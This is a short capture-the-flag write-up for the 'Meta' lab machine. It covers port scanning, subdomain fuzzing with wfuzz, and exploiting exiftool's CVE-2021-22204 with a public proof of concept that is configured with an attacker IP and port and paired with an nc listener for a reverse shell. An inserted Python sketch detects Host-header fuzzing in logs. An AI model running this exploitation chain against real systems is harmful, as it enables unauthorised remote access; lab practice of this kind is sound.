CTF Meta

hosts

/etc/hosts
10.10.11.140 artcorp.htb

rustscan

rustscan -a meta.htb --range 1-65000

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack

wfuzz

Nothing with the dir listing,
but with the sub listing I have this:
https://infinitelogins.com/2020/09/02/bruteforcing-subdomains-wfuzz/

wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains.lst -u 'http://artcorp.htb' -H "Host: FUZZ.artcorp.htb" --hw 9000 |grep 200

dev01.artcorp.htb.
I add it to my /etc/hosts.
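
On the server side, the Host-header fuzzing above shows up as one client asking for many hostnames the server does not serve. A detection sketch for that pattern, added here as an example and not part of the original writeup; the log layout, the known-host list, the sample lines and the window/threshold values are all assumptions:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log layout (not from the page): ip host [timestamp] "request" status bytes
LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<host>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" \d{3} \S+$')
KNOWN_HOSTS = {"artcorp.htb", "dev01.artcorp.htb"}  # vhosts the server really serves

# Constructed sample: one client cycling through guessed names, one ordinary client.
GUESSES = ["www", "mail", "admin", "test", "staging", "vpn", "dev01"]
SAMPLE_LOG = [
    f'203.0.113.7 {g}.artcorp.htb [12/Mar/2022:10:00:{i:02d} +0000] "GET / HTTP/1.1" 200 9100'
    for i, g in enumerate(GUESSES)
] + [
    '198.51.100.20 artcorp.htb [12/Mar/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 9100',
    '198.51.100.20 dev01.artcorp.htb [12/Mar/2022:10:00:09 +0000] "GET / HTTP/1.1" 200 3000',
]


def parse(lines):
    """Yield (timestamp, client_ip, normalised host) for well-formed lines."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than crash
        try:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue
        yield ts, m["ip"], m["host"].lower().rstrip(".")


def find_vhost_sweeps(lines, known_hosts, window=timedelta(seconds=60), threshold=5):
    """Map client IP -> unknown hosts it asked for, for clients that request more
    than `threshold` distinct unknown Host values inside one `window`."""
    per_client = defaultdict(list)
    for ts, ip, host in sorted(parse(lines)):
        if host not in known_hosts:
            per_client[ip].append((ts, host))
    flagged = {}
    for ip, seen in per_client.items():
        start = 0
        for end in range(len(seen)):
            # Slide the window start forward until it spans at most `window`.
            while seen[end][0] - seen[start][0] > window:
                start += 1
            if len({h for _, h in seen[start:end + 1]}) > threshold:
                flagged[ip] = sorted({h for _, h in seen})
                break
    return flagged
```

Calling `find_vhost_sweeps(SAMPLE_LOG, KNOWN_HOSTS)` flags only the client that cycled through guessed names; requests for hosts in `KNOWN_HOSTS` never count toward the threshold.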

It’s an exif tool, to see the metadata.

Exploit exiftool

https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
I found this website, which gives some cool info.
CVE-2021-22204
https://github.com/convisolabs/CVE-2021-22204-exiftool

Install exiftool

https://exiftool.org/install.html

Install djvulibre

sudo pacman -S djvulibre

Download

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git

Edit the file

ip = '10.10.15.22'
port = '4444'

Open the listener

nc -nlvp 4444

BOOMMMM

I upload the file and the shell pops.

I need to go to sleep…